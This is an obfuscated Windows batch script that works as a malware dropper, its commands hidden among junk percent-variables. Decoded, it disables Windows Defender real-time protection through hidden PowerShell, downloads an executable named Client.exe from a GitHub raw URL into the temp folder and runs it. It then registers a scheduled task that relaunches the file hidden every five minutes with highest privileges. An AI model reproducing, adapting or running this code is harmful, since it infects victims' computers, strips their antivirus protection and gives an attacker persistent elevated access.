::x
@%tUUezt%e%uWAju%c%pZdLJ%h%QNq%o%OHXwilp% %FrSSSnirME%o%bxa%f%ocRH%f%qnr%
s%LewcGnTXaQ%e%TOwGGXIu%t%fu% %UuouPH%"%OVs%f%meXJpFlm%i%as%l%zQTuXUql%e%FzjUlEz%n%cIXYNo%a%ah%m%CImSc%e%riA%=%bZTS%C%aTQguLG%l%tT%i%AcGcWDHhvy%e%wJJihDKQto%n%auB%t%gPV%.%PpDXB%e%gwQOBxtQZ%x%f%e%JlxRFQnFMB%"%wjFl%
s%GUTkCQDmN%e%TlpVE%t%bG% %zx%"%Vm%f%PD%i%hTQAtFqVR%l%QXuKOUkaIG%e%h%p%ckXRTjvpwz%a%ouTNjXqar%t%NGs%h%OBiZjxYGF%=%vAVJ%%TEMP%\%KK%%filename%"%RvtOHIBSV%
set "url=https://github.com/tazerno/test/raw/refs/heads/main/%filename%"
s%ig%e%auPqRgc%t%Xfv% %bWN%"%Sv%u%nNBPMMcJK%r%lqqfXr%l%GoyK%=%G%h%XprbqUJLSY%t%h%t%luTtX%p%cWOagqB%s%bAuPKqsO%:%gd%/%CzdaIGLyBC%/%wsueeftWWe%g%FFnHOtcSY%i%wk%t%jMzf%h%ibLnEqkUSu%u%UIlAI%b%dSvlHX%.%yMcZwiixcH%c%W%o%KdNTqfcQYk%m%U%/%ecN%t%pXJa%a%tPf%z%oXiM%e%kGuqqf%r%Uw%n%H%o%fp%/%G%t%S%e%HeqRDPz%s%EtOXSVAj%t%jeNNL%/%pq%r%xQDkk%a%EEAirCpJ%w%OA%/%GEqQV%r%mWyvsS%e%YQUJ%f%XjSbHplKx%s%HdImoCLPoP%/%pDqun%h%H%e%QYOfB%a%uO%d%zqSDN%s%EMZ%/%b%m%Iu%a%gf%i%Ui%n%LsQvyLsP%/%wuM%%filename%"%W%

:: x
:%xF%:%ZbNtwPWI% %JdtU%D%czJvazesY%e%bu%f%XGrgIs%e%yMXEUXgjK%n%aQWXFYCZyR%d%zbVyb%e%YblWoFmle%r%xdNWMaYZu%'%qrUAcawo%ı%JEjOQ% %mfHpLMCIq%d%MNrtcfca%e%aDzvXa%v%xPc%r%aiy%e%LFRKc% %uQdsGQQNN%d%PxooAjJnua%ı%GFoBYaUJq%ş%vmdlu%ı%HGAyHaXml% %rmupNRhL%b%iQFIpmsl%ı%bBRKGr%r%owOFTc%a%MB%k%FTSEz% %kkRIVysodh%(%zQVCrlmtVm%b%Y%a%O%ş%aaGQioFcz%a%hrzhjav%r%ljfAIwysbt%ı%LdyW%s%ubhsPVkIAa%ı%FLcm%z%AprNtHdK% %ZzRhhnh%o%bKwCV%l%M%s%qwg%a%hClpoXi% %mXKum%d%UVvrOcFi%a%atorj% %L%d%z%e%zGLXaDs%v%SyPCohF%a%DyKmGu%m%cDh% %re%e%DhLCA%d%IPCMorhHON%e%yiSwJndjJ%r%QhPCk%)%gwzP%
p%N%o%yLHcW%w%rMHHKFsc%e%NMtOxY%r%WEPLUWz%s%xBlvORsN%h%hTLWGAwq%e%KfIYoOcs%l%fRLhTPokH%l%EKaM% %EsP%-%vchafg%N%Itg%o%rwYuEZ%P%wEQkhXacUl%r%nDRm%o%LytnKWy%f%bWdMczCoAJ%i%KSsbaLSJO%l%OBYuWWpWi%e%OAfDrorRH% %tQddFxyx%-%rC%E%xlSe%x%pvIZLbvSBX%e%nCYPVamiu%c%kj%u%PtX%t%SRV%i%XWcrrsHX%o%AOzbNluPr%n%fdmdtaNt%P%kpJ%o%JbKqvi%l%EU%i%ILCwWsya%c%xOrtkjoupD%y%ZVH% %lsJ%B%oHUrLn%y%vb%p%zUyqr%a%NklTd%s%kz%s%h% %W%-%IURzmFUpj%W%EoEYfvvfy%i%Aeh%n%dx%d%szaJmIBpt%o%hktLPQEW%w%YlfqNcEnuX%S%zlEDLW%t%tTnI%y%KjRHrwU%l%OnLUIg%e%iDplHVJgh% %CsLuA%H%u%i%h%d%WMQs%d%yOrRCYEzIv%e%yrDl%n%eLfzvhMTq% %he%-%AXpfSPoiJN%C%SB%o%lAUq%m%chidoyCl%m%ZSzQx%a%vTZQpaB%n%qkxsaVZZDb%d%duJklgKi% %cSKjrPAywn%^%rNlKtxnn%
"%HYN%t%jumscZ%r%UQl%y%cOntYGI% %GOxBTD%{%LoeEah% %aYlgleJ%S%RS%e%C%t%KUS%-%axsEux%M%uwTZ%p%MqjhVnncRj%P%DHjrimWoe%r%nBStqAH%e%xnjGFHcCQ%f%E%e%fqEfL%r%JXmMQHFUhh%e%GfvsChYlu%n%IerEKAWm%c%qW%e%hGMydwHgk% %GdOi%-%w%D%zlEkB%i%RWyGhK%s%xy%a%YyEgJGV%b%r%l%Y%e%QQ%R%ihNqdNWLEr%e%CA%a%byTbRB%l%uckjEkMg%t%rbfmhshg%i%byeiVL%m%hQSS%e%Ed%M%hjFbCPWN%o%JsziID%n%InlUKK%i%hI%t%hzg%o%hejuuFs%r%xRu%i%AVaiSRwiS%n%t%g%YZinPmos% %LOzNSdOvn%$%pMmh%t%RPygCX%r%FcjKXylI%u%sxutWxtT%e%SjgJh% %ingWUsbN%-%xjSpWqP%E%HHgAo%r%EPaBXvYr%r%uXBlNUIwP%o%X%r%y%A%ulIkeoCMsE%c%cXhKVONi%t%LMxcW%i%EtSYQ%o%MYBxZnZ%n%kyijqaQN% %uJF%S%hUpbVa%i%JsDn%l%vOtMPAb%e%R%n%PmaMdJG%t%JZdTp%l%vWIjP%y%PWf%C%CIvBmI%o%JVXmMf%n%iUvvz%t%Oc%i%aDGImFfrS%n%RGRNNdgFDr%u%WbPa%e%dN% %RlosCeFxX%}%MWViF% %ZOjnrQ%c%VnZRfZO%a%gu%t%AEB%c%cnoL%h%ZWozjN% %U%{%NuuAtlQH%}%mA%"%TQHksjlQ%

:: x
:%uVqBJC%:%cCe% %aJS%D%kAVOLRMuiR%o%VYZJvkPDbM%s%fwRDr%y%HH%a%oFcfO%y%fLUkuwl%ı%Oe% %tKnbbYK%i%CL%n%Y%d%NRqCQmsf%i%BhBEeHLEtr%r%mcZqb%
p%VpltlxvPdm%o%BsunNDw%w%odYL%e%Cr%r%rcGxxjFEj%s%vRnwv%h%LEQLKKVe%e%tzRHleZxIO%l%EtR%l%JqmmOiXxz% %ixsGGIoHBZ%-%TMNFx%N%BeRUNo%o%KZrpJu%P%ClWWargJrA%r%IMl%o%eskOZIxMJj%f%U%i%SoHL%l%vvUgpD%e%SWLs% %bVdwlqjHpw%-%byjRN%E%lgn%x%JhwJU%e%XRXPzsT%c%JpCsqua%u%BnWreo%t%kYnqJ%i%X%o%ypsbOmIx%n%d%P%LPbIeYeiaW%o%F%l%eqdsVFSBJl%i%cQ%c%edZLfYYA%y%CR% %BEQBTJjVD%B%aWqdXDjHPY%y%kDmMBTMktz%p%b%a%DKoW%s%AGyZBmUWS%s%Tj% %cpPJtIzJ%-%ZMFwptlgE%W%TsYzMVHf%i%R%n%XivmE%d%wIfRsfUs%o%EY%w%Pcc%S%UKTyRMnuxz%t%ywquFYPOrN%y%VhmuhdA%l%PEUkXMssOK%e%mzqMhN% %WEEfBUTBf%H%ZqV%i%FLJd%d%HggYubT%d%NxvWqIDz%e%xASWyPX%n%UpIXvshQc% %O%-%BgciO%C%ldinLPjjXl%o%wgdpCSPWEq%m%b%m%Oy%a%iMEHiX%n%Dqf%d%dM% %BZzuZ%^%wSrBcjDbH%
"%yTCKxYUT%I%bdLbFuWa%n%l%v%FkL%o%ZDDsEYMR%k%sR%e%imCNmfd%-%MXEDUvoM%W%qRYXvVpai%e%LbAfuVkkCi%b%tKRBckV%R%MuT%e%cUto%q%cJNPzoS%u%b%e%YcksRYWwx%s%tzIZgDDa%t%XxDzpZ% %Ts%-%JRVgwsjIW%U%cDrpnQ%r%vBjzARXwnR%i%rMKgkFByu% %Tjw%'%naO%%url%'%jNvUT% %B%-%nbyvGLvAe%O%EnccHEkrh%u%rOqGGcwGA%t%mXOMrorVNs%F%vXTrd%i%talrYkO%l%EXiLGgGFS%e%gZsiPRen% %GZS%'%FTFeFP%%filepath%'%QDZnb%"%Fn%

:: x
:%NfwzbyWQt%:%m% %yTm%D%sZIsdf%o%cRE%s%rEoHT%y%otMMDt%a%NMuEysvuf%y%gSknEsGKt%ı%PBLQtT% %QCbZJLZGBx%a%sNvehcwmQQ%n%AfYEstLjtz%ı%Y%n%YJUocOgYE%d%Z%a%XeKtwdZL% %tGkLYPMFGT%ç%hK%a%R%l%XQZKhWV%ı%oozQF%ş%AsPl%t%ZCj%ı%uS%r%kHn%
s%oKdA%t%jhQGmue%a%jOUCS%r%XAKAY%t%aW% %ZyRfDO%"%dbY%"%YrKhI% %IaOmPC%"%jNUHgv%%filepath%"%NSA%

:: x
:%amDL%:%xFi% %RhXNIwd%Z%OL%a%ALMM%m%yItx%a%E%n%WBaYurZS%l%RWo%a%jJZdoItnuq%n%uOOTaCQvId%m%nHBDFOn%ı%BYHW%ş%Fw% %JttGVx%g%gCOVMcIh%ö%IjrrkN%r%z%e%zXEBuilDJ%v%Ov% %X%o%GsQ%l%nJeyKGjCPz%u%fLWtnMIShZ%ş%xtydbPt%t%fam%u%VuWaj%r%JFmHOQ% %FgU%(%WPrOiNiYr%h%iJPYtXmV%e%HqYAKES%r%AQXBXWYGrp% %AovwsVTqE%5%TFQ% %s%d%Yry%a%mVcR%k%D%i%Fre%k%yd%a%KqpmCNLotw%d%HiicPngMp%a%xLlzKPaFJ% %Vx%b%rrzwuthlg%i%ufZ%r%UJ% %JciQ%ç%u%a%YQDpeMsPHX%l%dpuAXc%ı%tOftMdPYB%ş%nFLJLk%t%sHBHFg%ı%NlawP%r%zO%a%LhtIpWrYLs%c%GGDBJDdn%a%ZdimQ%k%mtFYjuA%)%JeYErhbc%
s%uNVUpbj%c%r%h%EXchm%t%KjyxD%a%oJxWbdx%s%FrioO%k%uKIvsXhtUW%s%qcUOSZlUSd% %onpdBkC%/%rEMthxIF%c%cLTFF%r%UEOS%e%OJfpX%a%GlvqWVCR%t%fFwpwoepE%e%x% %FEfCB%/%J%f%aEUEDouRiN% %mNHTNs%/%ewdPvsOa%s%oDWvKVoaQE%c%k% %VWUsEOyqkj%m%cUcoqqMR%i%bFgAT%n%HLBKCOF%u%e%t%S%e%iBjO% %rk%/%ANIdJNVPNV%m%LFlgjX%o%AGAN% %v%5%olXpQ% %GYfvWWxp%/%oYDFnw%t%njjkR%n%sTDDu% %cjhBV%"%vt%C%kwTpXsx%l%ZBPduGtwp%i%rOtCjZbk%e%Ufvlmj%n%IdaDWkEdQg%t%JatNVAgApG%T%Py%a%vHzhx%s%WDLOYYdt%k%EagcY%"%ubkCNtP% %MDa%^%CNcTwIs%
/%BESLao%t%YhyreiRCPa%r%Bk% %NPrDy%"%UTNtTXXYWk%p%oVoBKcbYli%o%PndWRRDoQ%w%hSTHauoAKL%e%kZtHxyuqhI%r%vqIdMS%s%yFmRKmBtG%h%REKfl%e%XGui%l%TZ%l%UJdiQE%.%db%e%mobS%x%FpRgnly%e%TtoVUua% %fw%-%EOjowHe%N%tVwTuQ%o%LHHP%P%oRieIOhAnT%r%fNMNLro%o%rxGmby%f%PDAQsEh%i%wyBED%l%uwvSizYLb%e%Ru% %j%-%FdUpngsCOK%E%OqsScYknY%x%fIzAk%e%B%c%zjX%u%ZqyXPUGO%t%qKCpBnxeq%i%PLHeUg%o%hRYOXvdj%n%THtlJdhMB%P%hDADh%o%IYmaSVTRJg%l%jllPjyvGj%i%jxgaDY%c%SB%y%YmtEVz% %q%B%uHs%y%jXiJMwos%p%sxubf%a%A%s%BDpNGn%s%Ba% %Stapc%-%LZzzwys%W%fXBGrkcib%i%nHXyHQFcmi%n%VCUE%d%uMtOZNBG%o%ulkCh%w%VRxNH%S%BAx%t%AeGnAD%y%lnuTuXkDHa%l%ccBEaeh%e%nZHfxVB% %Kq%H%BUkEZ%i%Jw%d%JwAoSrYJ%d%akWz%e%BoBm%n%KmIV% %At%-%wztEeKp%F%enP%i%xARwuLZ%l%ribMQuIWpY%e%CQfJYm% %jv%\%ENIGQD%"%ruvfiyAq%%filepath%\%GtwV%"%YenRQlAn%"%WZMaCQidw% %bR%^%OdoqiClnG%
/%KdVuhDFW%r%yyd%l%qssE% %zDydajSR%H%Bi%I%ELCwywT%G%Y%H%y%E%UhgpdeaQjY%S%PtPSWWRbb%T%rSe% %CtQNRtqMs%/%ZTWt%r%yfhcIc%u%tKWTKIiB% %KpnxuKf%S%sZRSWs%Y%PauljclQqP%S%jOymUTrJrs%T%kewHQCuKdc%E%sNuojDI%M%HmuJcwiI%
